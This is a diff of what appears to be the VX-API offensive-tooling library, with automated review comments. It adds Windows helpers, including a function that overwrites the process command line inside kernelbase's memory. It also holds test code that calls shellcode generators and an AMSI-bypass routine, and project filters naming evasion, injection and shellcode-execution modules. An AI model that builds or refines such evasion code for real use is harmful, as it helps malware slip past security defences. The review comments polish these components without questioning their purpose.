|
||||
|
||||
///*******************************************
|
||||
// IMAGEHLP IMPORT
|
||||
//*******************************************/
|
||||
typedef BOOL(WINAPI* IMAGEGETDIGESTSTREAM)(HANDLE, DWORD, LPVOID, PHANDLE);
|
||||
/*******************************************
|
||||
IMAGEHLP IMPORT
|
||||
/*******************************************/
|
||||
typedef BOOL(WINAPI* IMAGEGETDIGESTSTREAM)(HANDLE, DWORD, LPVOID, PHANDLE);
|
||||
|
||||
|
||||
/*******************************************
|
||||
ADVPACK IMPORT
|
||||
/*******************************************/
|
||||
typedef HRESULT(WINAPI* DELNODEW)(LPCWSTR, DWORD);
|
||||
typedef BOOL(WINAPI* ISNTADMIN)(DWORD, LPDWORD);
|
||||
typedef HRESULT(WINAPI* EXTRACTFILESW)(LPCWSTR, LPCWSTR, DWORD, LPCWSTR, LPVOID, DWORD);
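Review bot: The new IMAGEHLP and ADVPACK comment blocks close with a line that begins with `/*` while the block comment is still open (`/*******************************************/`), which MSVC and GCC report as a "/* within block comment" warning; close them with `*******************************************/` instead (the replaced `///****` form did not have this problem). The `ISNTADMIN` typedef gives no hint that both IsNTAdmin arguments are reserved and must be 0 and NULL; a one-line comment on the typedef, e.g. `// IsNTAdmin(DWORD dwReserved /* 0 */, LPDWORD lpdwReserved /* NULL */)`, keeps callers from passing meaningful values.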
|
||||
|
|
|
@ -0,0 +1,29 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
HANDLE IeCreateFileW(LPCWSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile)
|
||||
{
|
||||
typedef HANDLE(WINAPI* IECREATEFILE)(LPCWSTR, DWORD, DWORD, LPSECURITY_ATTRIBUTES, DWORD, DWORD, HANDLE);
|
||||
IECREATEFILE IeCreateFile = NULL;
|
||||
|
||||
IeCreateFile = (IECREATEFILE)GetProcAddressA((DWORD64)TryLoadDllMultiMethodW((PWCHAR)L"ieframe.dll"), "IECreateFile");
|
||||
if (!IeCreateFile)
|
||||
return NULL;
|
||||
|
||||
return IeCreateFile(lpFileName, dwDesiredAccess, dwShareMode, lpSecurityAttributes, dwCreationDisposition, dwFlagsAndAttributes, hTemplateFile);
|
||||
}
|
||||
|
||||
HANDLE IeCreateFileA(LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile)
|
||||
{
|
||||
typedef HANDLE(WINAPI* IECREATEFILE)(LPCWSTR, DWORD, DWORD, LPSECURITY_ATTRIBUTES, DWORD, DWORD, HANDLE);
|
||||
IECREATEFILE IeCreateFile = NULL;
|
||||
WCHAR ccBuffer[MAX_PATH * sizeof(WCHAR)] = { 0 };
|
||||
|
||||
IeCreateFile = (IECREATEFILE)GetProcAddressA((DWORD64)TryLoadDllMultiMethodW((PWCHAR)L"ieframe.dll"), "IECreateFile");
|
||||
if (!IeCreateFile)
|
||||
return NULL;
|
||||
|
||||
if (CharStringToWCharString(ccBuffer, (PCHAR)lpFileName, StringLengthA(lpFileName)) == 0)
|
||||
return NULL;
|
||||
|
||||
return IeCreateFile(ccBuffer, dwDesiredAccess, dwShareMode, lpSecurityAttributes, dwCreationDisposition, dwFlagsAndAttributes, hTemplateFile);
|
||||
}
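Review bot: `TryLoadDllMultiMethodW((PWCHAR)L"ieframe.dll")` can return NULL, and in both variants its result is cast to `DWORD64` and handed straight to `GetProcAddressA` without a check; unless that helper tolerates a zero module base (not visible here), resolve into a local first, `HMODULE hMod = TryLoadDllMultiMethodW((PWCHAR)L"ieframe.dll"); if (!hMod) return NULL;`, and pass `hMod` to the lookup. Returning NULL on failure is also ambiguous for a CreateFile-style API whose documented failure value is INVALID_HANDLE_VALUE: callers that compare against INVALID_HANDLE_VALUE will treat NULL as a usable handle, so either return INVALID_HANDLE_VALUE or state the NULL convention in a header comment. In the A variant the path conversion runs after the export lookup; doing the cheap conversion first avoids the DLL load on bad input.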
|
|
@ -0,0 +1,25 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
BOOL IsProcessRunningAsAdmin2(VOID)
|
||||
{
|
||||
ISNTADMIN IsNtAdmin = NULL;
|
||||
HMODULE hMod = NULL;
|
||||
BOOL bFlag = FALSE;
|
||||
|
||||
hMod = LoadLibraryW(L"advpack.dll");
|
||||
if (hMod == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
IsNtAdmin = (ISNTADMIN)GetProcAddressA((DWORD64)hMod, "IsNTAdmin");
|
||||
if (!IsNtAdmin)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
bFlag = IsNtAdmin(0, NULL);
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (hMod)
|
||||
FreeLibrary(hMod);
|
||||
|
||||
return bFlag;
|
||||
}
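Review bot: The function collapses three outcomes into FALSE — advpack.dll failed to load, the IsNTAdmin export was not found, and the caller genuinely not being an administrator — so a caller cannot tell "not elevated" from "check unavailable". A header comment stating that, and that this variant relies on advpack!IsNTAdmin (both arguments reserved, hence `IsNtAdmin(0, NULL)`) rather than a token query, would make the `2` suffix meaningful to readers; alternatively return a DWORD error like CreateProcessFromWmiWin32_ProcessW so the distinction is visible.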
|
|
@ -2,15 +2,24 @@
|
|||
|
||||
INT main(VOID)
|
||||
{
|
||||
//////////////////////////////////////////////////////////////////////////
|
||||
//
|
||||
// The following variables are used for VX-API development and debugging,
|
||||
// they do not serve any purpose and can be removed.
|
||||
//
|
||||
//////////////////////////////////////////////////////////////////////////
|
||||
DWORD dwSize = 0;
|
||||
PCHAR Buffer = GenericShellcodeOpenCalcExitThread(&dwSize);
|
||||
PCHAR ppShellcodeBuffer = GenericShellcodeOpenCalcExitThread(&dwSize);
|
||||
WCHAR wBuffer[MAX_PATH * sizeof(WCHAR)] = L"C:\\Windows\\System32\\calc.exe";
|
||||
CHAR cBuffer[MAX_PATH] = "C:\\Windows\\System32\\calc.exe";
|
||||
|
||||
//////////////////////////////////////////////////////////////////////////
|
||||
//
|
||||
// Test area
|
||||
//
|
||||
//////////////////////////////////////////////////////////////////////////
|
||||
|
||||
//MpfSceViaSymEnumSourceFiles((PBYTE)Buffer, dwSize);
|
||||
|
||||
//BOOL bFlag = AmsiBypassViaPatternScan(4288);
|
||||
|
||||
CreateProcessFromShell32ShellExecRunDllW(L"C:\\Windows\\System32\\calc.exe");
|
||||
|
||||
return ERROR_SUCCESS;
|
||||
}
|
||||
|
||||
Sleep(1);
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,21 @@
|
|||
#include "StringManipulation.h"
|
||||
|
||||
VOID RtlInitAnsiString(_Inout_ PANSI_STRING DestinationString, _In_ PCSTR SourceString)
|
||||
{
|
||||
SIZE_T Size;
|
||||
|
||||
if (SourceString)
|
||||
{
|
||||
Size = StringLengthA(SourceString);
|
||||
if (Size > (65535 - sizeof(CHAR))) Size = 65535 - sizeof(CHAR);
|
||||
DestinationString->Length = (USHORT)Size;
|
||||
DestinationString->MaximumLength = (USHORT)Size + sizeof(CHAR);
|
||||
}
|
||||
else
|
||||
{
|
||||
DestinationString->Length = 0;
|
||||
DestinationString->MaximumLength = 0;
|
||||
}
|
||||
|
||||
DestinationString->Buffer = (PCHAR)SourceString;
|
||||
}
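Review bot: The function aliases rather than copies: `DestinationString->Buffer = (PCHAR)SourceString` makes the ANSI_STRING point at the caller's memory with the const cast away, so a header comment should state that `SourceString` must outlive `DestinationString` and must not be modified through it. The clamp `if (Size > (65535 - sizeof(CHAR))) Size = 65535 - sizeof(CHAR);` silently truncates longer inputs to 0xFFFE bytes so that `MaximumLength` fits in a USHORT; that behaviour, and the fact that `MaximumLength` counts the terminator while `Length` does not, belongs in the same comment. Using `MAXUSHORT` in place of the literal 65535 would make the intent readable.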
|
|
@ -0,0 +1,108 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
BOOL RtlSetBaseUnicodeCommandLine(PWCHAR CommandLinePayload)
|
||||
{
|
||||
PIMAGE_DOS_HEADER Dos = NULL;
|
||||
PIMAGE_NT_HEADERS Nt = NULL;
|
||||
PIMAGE_FILE_HEADER File = NULL;
|
||||
PIMAGE_OPTIONAL_HEADER Optional = NULL;
|
||||
HMODULE hKernelBase = NULL;
|
||||
PBYTE BaseAddress = NULL;
|
||||
BOOL bFlag = FALSE;
|
||||
PIMAGE_SECTION_HEADER SectionHeaderArray = NULL;
|
||||
PULONG_PTR DataSegment = ERROR_SUCCESS;
|
||||
DWORD NumberOfPointers = ERROR_SUCCESS;
|
||||
PWSTR CommandLineString = NULL;
|
||||
PSTR CommandLineStringA = NULL;
|
||||
PUNICODE_STRING CommandLineUnicodeString = NULL;
|
||||
PANSI_STRING CommandLineAnsiString = NULL;
|
||||
PPEB Peb = GetPeb();
|
||||
PLDR_MODULE Module = NULL;
|
||||
|
||||
hKernelBase = TryLoadDllMultiMethodW((PWCHAR)L"kernelbase.dll");
|
||||
if (!hKernelBase)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
BaseAddress = (PBYTE)hKernelBase;
|
||||
|
||||
if (!RtlLoadPeHeaders(&Dos, &Nt, &File, &Optional, &BaseAddress))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
SectionHeaderArray = (PIMAGE_SECTION_HEADER)(ULONGLONG(Nt) + sizeof(IMAGE_NT_HEADERS));
|
||||
for (DWORD dwX = 0; dwX < File->NumberOfSections; dwX++)
|
||||
{
|
||||
if (StringCompareA((PCHAR)SectionHeaderArray[dwX].Name, ".data") == ERROR_SUCCESS)
|
||||
{
|
||||
DataSegment = (PULONG_PTR)(BaseAddress + SectionHeaderArray[dwX].VirtualAddress);
|
||||
NumberOfPointers = SectionHeaderArray[dwX].Misc.VirtualSize / sizeof(ULONG_PTR);
|
||||
bFlag = TRUE;
|
||||
break;
|
||||
}
|
||||
}
|
||||
|
||||
if (!bFlag)
|
||||
goto EXIT_ROUTINE;
|
||||
else
|
||||
bFlag = FALSE;
|
||||
|
||||
CommandLineString = GetCommandLineW();
|
||||
if (CommandLineString == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
for (DWORD dwX = 0; dwX < NumberOfPointers; dwX++)
|
||||
{
|
||||
CommandLineUnicodeString = (PUNICODE_STRING)&DataSegment[dwX];
|
||||
__try
|
||||
{
|
||||
if (StringCompareW(CommandLineUnicodeString->Buffer, CommandLineString) == 0)
|
||||
{
|
||||
RtlInitUnicodeString(CommandLineUnicodeString, CommandLinePayload);
|
||||
break;
|
||||
}
|
||||
}
|
||||
__except (EXCEPTION_EXECUTE_HANDLER) { continue; }
|
||||
}
|
||||
|
||||
CommandLineStringA = GetCommandLineA();
|
||||
if (CommandLineStringA == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
for (DWORD dwX = 0; dwX < NumberOfPointers; dwX++)
|
||||
{
|
||||
CommandLineAnsiString = (PANSI_STRING)&DataSegment[dwX];
|
||||
__try
|
||||
{
|
||||
if (StringCompareA(CommandLineAnsiString->Buffer, CommandLineStringA) == 0)
|
||||
{
|
||||
CHAR ccBuffer[MAX_PATH] = { 0 };
|
||||
ANSI_STRING AnsiString = { 0 };
|
||||
|
||||
if (WCharStringToCharString(ccBuffer, CommandLinePayload, StringLengthW(CommandLinePayload)) == 0)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
RtlInitAnsiString(&AnsiString, ccBuffer);
|
||||
|
||||
if (CopyMemoryEx(&DataSegment[dwX], &AnsiString, sizeof(ANSI_STRING)) == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
break;
|
||||
}
|
||||
}
|
||||
__except (EXCEPTION_EXECUTE_HANDLER) { continue; }
|
||||
}
|
||||
|
||||
Module = (PLDR_MODULE)((PBYTE)Peb->LoaderData->InMemoryOrderModuleList.Flink - 16);
|
||||
|
||||
for (DWORD dwX = 0; TRUE; dwX++)
|
||||
{
|
||||
Module = (PLDR_MODULE)((PBYTE)Module->InMemoryOrderModuleList.Flink - 16);
|
||||
if (Module->BaseDllName.Buffer == NULL)
|
||||
break;
|
||||
}
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
return bFlag;
|
||||
}
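Review bot: In the ANSI loop, `CHAR ccBuffer[MAX_PATH]` is a stack local, `RtlInitAnsiString(&AnsiString, ccBuffer)` aliases it, and `CopyMemoryEx(&DataSegment[dwX], &AnsiString, sizeof(ANSI_STRING))` stores that ANSI_STRING in kernelbase's .data, so once this function returns the stored Buffer points into dead stack memory and any later `GetCommandLineA()` reads garbage. The copy needs a lifetime at least as long as the patched string (a static or heap buffer that is deliberately not freed), and the same requirement already applies to `CommandLinePayload`, which `RtlInitUnicodeString` aliases for the Unicode entry; both should be stated in a header comment. The final loop over `Peb->LoaderData->InMemoryOrderModuleList` assigns `Module` but never uses it afterwards, so it is dead code with a hard-coded `- 16` offset and can be dropped. `PULONG_PTR DataSegment = ERROR_SUCCESS;` initialises a pointer from an integer constant; `NULL` is the right initialiser. This hunk contains the whole function.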
|
|
@ -30,6 +30,7 @@ VOID CharArrayToByteArrayA(_In_ PCHAR Char, _Inout_ PBYTE Byte, _In_ DWORD Lengt
|
|||
VOID CharArrayToByteArrayW(_In_ PWCHAR Char, _Inout_ PBYTE Byte, _In_ DWORD Length);
|
||||
VOID RtlInitUnicodeString(_Inout_ PUNICODE_STRING DestinationString, _In_ PCWSTR SourceString);
|
||||
VOID RtlInitEmptyUnicodeString(_Inout_ PUNICODE_STRING UnicodeString);
|
||||
VOID RtlInitAnsiString(_Inout_ PANSI_STRING DestinationString, _In_ PCSTR SourceString);
|
||||
SIZE_T CharStringToWCharString(_Inout_ PWCHAR Destination, _In_ PCHAR Source, _In_ SIZE_T MaximumAllowed);
|
||||
SIZE_T WCharStringToCharString(_Inout_ PCHAR Destination, _In_ PWCHAR Source, _In_ SIZE_T MaximumAllowed);
|
||||
VOID ByteArrayToCharArrayA(_Inout_ PCHAR Destination, _In_ PBYTE Source, _In_ DWORD Length);
|
||||
|
|
|
@ -157,13 +157,17 @@
|
|||
<ClCompile Include="CreateProcessFromIHxInteractiveUser.cpp" />
|
||||
<ClCompile Include="CreateProcessFromINFSectionInstallStringNoCab.cpp" />
|
||||
<ClCompile Include="CreateProcessFromINFSectionInstallStringNoCab2.cpp" />
|
||||
<ClCompile Include="CreateProcessFromINFSectionInstallStringNoCab3.cpp" />
|
||||
<ClCompile Include="CreateProcessFromINFSetupCommand.cpp" />
|
||||
<ClCompile Include="CreateProcessFromIShellDispatchInvoke.cpp" />
|
||||
<ClCompile Include="CreateProcessFromMSHTML.cpp" />
|
||||
<ClCompile Include="CreateProcessFromPcwUtil.cpp" />
|
||||
<ClCompile Include="CreateProcessFromShdocVwOpenUrl.cpp" />
|
||||
<ClCompile Include="CreateProcessFromShell32ShellExecRunDll.cpp" />
|
||||
<ClCompile Include="CreateProcessFromShell32ShellExecRun.cpp" />
|
||||
<ClCompile Include="CreateProcessFromShellExecuteInExplorerProcess.cpp" />
|
||||
<ClCompile Include="CreateProcessFromUrlFileProtocolHandler.cpp" />
|
||||
<ClCompile Include="CreateProcessFromUrlOpenUrl.cpp" />
|
||||
<ClCompile Include="CreateProcessFromWmiWin32_Process.cpp" />
|
||||
<ClCompile Include="CreateProcessFromZipfldrRouteCall.cpp" />
|
||||
<ClCompile Include="CreateProcessViaNtCreateUserProcess.cpp" />
|
||||
<ClCompile Include="CreateProcessWithCfGuard.cpp" />
|
||||
<ClCompile Include="CreatePseudoRandomInteger.cpp" />
|
||||
|
@ -172,17 +176,21 @@
|
|||
<ClCompile Include="CreateThreadAndWaitForCompletion.cpp" />
|
||||
<ClCompile Include="CreateWindowsObjectPath.cpp" />
|
||||
<ClCompile Include="DelayedExecutionExecuteOnDisplayOff.cpp" />
|
||||
<ClCompile Include="DeleteDirectoryAndSubDataViaDelNode.cpp" />
|
||||
<ClCompile Include="DeleteFileWithCreateFileFlag.cpp" />
|
||||
<ClCompile Include="DnsGetDomainNameIPv4AddressAsString.cpp" />
|
||||
<ClCompile Include="DnsGetDomainNameIPv4AddressUnsignedLong.cpp" />
|
||||
<ClCompile Include="ExampleOfUsageOfHardwareBreakpointHookingEngine.cpp" />
|
||||
<ClCompile Include="ExceptHandlerCallbackRoutine.cpp" />
|
||||
<ClCompile Include="ExtractFilesFromCabIntoTarget.cpp" />
|
||||
<ClCompile Include="Ex_GetHandleOnDeviceHttpCommunication.cpp" />
|
||||
<ClCompile Include="FastcallExecuteBinaryShellExecuteEx.cpp" />
|
||||
<ClCompile Include="GetCurrentProcessNoForward.cpp" />
|
||||
<ClCompile Include="GetCurrentThreadNoForward.cpp" />
|
||||
<ClCompile Include="GetPeSectionSizeInBytes.cpp" />
|
||||
<ClCompile Include="IeCreateFile.cpp" />
|
||||
<ClCompile Include="IsPeSection.cpp" />
|
||||
<ClCompile Include="IsProcessRunningAsAdmin2.cpp" />
|
||||
<ClCompile Include="LzMaximumCompressBuffer.cpp" />
|
||||
<ClCompile Include="LzMaximumDecompressBuffer.cpp" />
|
||||
<ClCompile Include="LzStandardCompressBuffer.cpp" />
|
||||
|
@ -259,7 +267,6 @@
|
|||
<ClCompile Include="LdrLoadGetProcedureAddress.cpp" />
|
||||
<ClCompile Include="MemoryFindMemory.cpp" />
|
||||
<ClCompile Include="MpfExtractMaliciousPayloadFromZipFileNoPassword.cpp" />
|
||||
<ClCompile Include="MpfLolExecuteRemoteBinaryByAppInstaller.cpp" />
|
||||
<ClCompile Include="Main.cpp" />
|
||||
<ClCompile Include="ManualResourceDataFetching.cpp" />
|
||||
<ClCompile Include="MasqueradePebAsExplorer.cpp" />
|
||||
|
@ -322,6 +329,8 @@
|
|||
<ClCompile Include="ReadDataFromPeSection.cpp" />
|
||||
<ClCompile Include="RemoveDescriptorEntry.cpp" />
|
||||
<ClCompile Include="RemoveRegisterDllNotification.cpp" />
|
||||
<ClCompile Include="RtlInitAnsiString.cpp" />
|
||||
<ClCompile Include="RtlSetBaseUnicodeCommandLine.cpp" />
|
||||
<ClCompile Include="SetHardwareBreakpoint.cpp" />
|
||||
<ClCompile Include="ShutdownHardwareBreakpointEngine.cpp" />
|
||||
<ClCompile Include="SleepObfuscationViaVirtualProtect.cpp" />
|
||||
|
@ -375,6 +384,9 @@
|
|||
<ItemGroup>
|
||||
<None Include="..\README.md" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<Text Include="Notes.txt" />
|
||||
</ItemGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
|
||||
<ImportGroup Label="ExtensionTargets">
|
||||
</ImportGroup>
|
||||
|
|
|
@ -58,9 +58,6 @@
|
|||
<Filter Include="Source Files\Windows API Helper Functions\Network Connectivity\Network Data Conversions">
|
||||
<UniqueIdentifier>{6be9adc7-8493-44a7-abce-3ec818469f70}</UniqueIdentifier>
|
||||
</Filter>
|
||||
<Filter Include="Source Files\Windows API Helper Functions\Malicious Capabilities\Lolbins">
|
||||
<UniqueIdentifier>{b688b3fc-f662-4634-b690-f200a79aee37}</UniqueIdentifier>
|
||||
</Filter>
|
||||
<Filter Include="Source Files\Rad Hardware Breakpoint Hooking Engine">
|
||||
<UniqueIdentifier>{148b86cd-abe4-43c3-a827-d89b58910722}</UniqueIdentifier>
|
||||
</Filter>
|
||||
|
@ -91,6 +88,12 @@
|
|||
<Filter Include="Source Files\Windows API Helper Functions\Cryptography Related\Compression\Xpress Huff">
|
||||
<UniqueIdentifier>{28a8f2b1-755e-465f-b650-13a6f1c191c3}</UniqueIdentifier>
|
||||
</Filter>
|
||||
<Filter Include="Source Files\Windows API Helper Functions\Process Creation">
|
||||
<UniqueIdentifier>{97f12dfe-6de4-480c-834c-ea10483eea2d}</UniqueIdentifier>
|
||||
</Filter>
|
||||
<Filter Include="Source Files\Windows API Helper Functions\File Handling">
|
||||
<UniqueIdentifier>{b1bb1e2e-db48-4d6e-91a7-213c6e47a46a}</UniqueIdentifier>
|
||||
</Filter>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="Main.cpp">
|
||||
|
@ -99,9 +102,6 @@
|
|||
<ClCompile Include="StringCopy.cpp">
|
||||
<Filter>Source Files\String Manipulation</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CaplockString.cpp">
|
||||
<Filter>Source Files\String Manipulation</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CopyMemoryEx.cpp">
|
||||
<Filter>Source Files\String Manipulation</Filter>
|
||||
</ClCompile>
|
||||
|
@ -249,9 +249,6 @@
|
|||
<ClCompile Include="CreateWindowsObjectPath.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="DeleteFileWithCreateFileFlag.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="GetCurrentDirectoryFromUserProcessParameters.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
|
||||
</ClCompile>
|
||||
|
@ -306,15 +303,6 @@
|
|||
<ClCompile Include="MpfComModifyShortcutTarget.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessWithCfGuard.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessFromIHxInteractiveUser.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessFromIHxHelpPaneServer.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="HashFileByMsiFileHashTable.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Cryptography Related</Filter>
|
||||
</ClCompile>
|
||||
|
@ -339,24 +327,12 @@
|
|||
<ClCompile Include="IsDebuggerPresentEx.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Antidebug</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateFileFromDsCopyFromSharedFile.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="DelayedExecutionExecuteOnDisplayOff.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateMd5HashFromFilePath.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Cryptography Related</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessFromShellExecuteInExplorerProcess.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessFromIShellDispatchInvoke.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessViaNtCreateUserProcess.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="GetOsMajorVersionFromPeb.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Fingerprinting</Filter>
|
||||
</ClCompile>
|
||||
|
@ -423,9 +399,6 @@
|
|||
<ClCompile Include="ShlwapiWCharStringToCharString.cpp">
|
||||
<Filter>Source Files\String Manipulation\String Conversion</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfExecutePeBinaryInMemoryFromByteArray.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="ManualResourceDataFetching.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
|
||||
</ClCompile>
|
||||
|
@ -468,12 +441,6 @@
|
|||
<ClCompile Include="IsRegistryKeyValid.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfLolExecuteRemoteBinaryByAppInstaller.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Lolbins</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="FastcallExecuteBinaryShellExecuteEx.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="HashStringMurmur.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Cryptography Related\String Hashing</Filter>
|
||||
</ClCompile>
|
||||
|
@ -540,12 +507,6 @@
|
|||
<ClCompile Include="CreatePseudoRandomIntegerFromNtdll.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Cryptography Related</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessByWindowsRHotKey.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessByWindowsRHotKeyEx.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfProcessInjectionViaProcessReflection.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Process Injection</Filter>
|
||||
</ClCompile>
|
||||
|
@ -762,38 +723,107 @@
|
|||
<ClCompile Include="MpfSceViaSymEnumSourceFiles.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CopyFileViaSetupCopyFile.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessFromINFSectionInstallStringNoCab.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessFromINFSetupCommand.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessFromPcwUtil.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="GetCurrentProcessNoForward.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="GetCurrentThreadNoForward.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessFromINFSectionInstallStringNoCab2.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
<ClCompile Include="CreateProcessFromUrlOpenUrl.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessFromIeFrameOpenUrl.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
<ClCompile Include="CreateProcessWithCfGuard.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessFromINFSectionInstallStringNoCab3.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
<ClCompile Include="CreateProcessViaNtCreateUserProcess.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessFromZipfldrRouteCall.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessFromShellExecuteInExplorerProcess.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessFromShell32ShellExecRun.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessFromShdocVwOpenUrl.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessFromUrlFileProtocolHandler.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessFromPcwUtil.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessFromIShellDispatchInvoke.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessFromINFSetupCommand.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessFromINFSectionInstallStringNoCab2.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessFromIHxInteractiveUser.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessFromIeFrameOpenUrl.cpp">
|
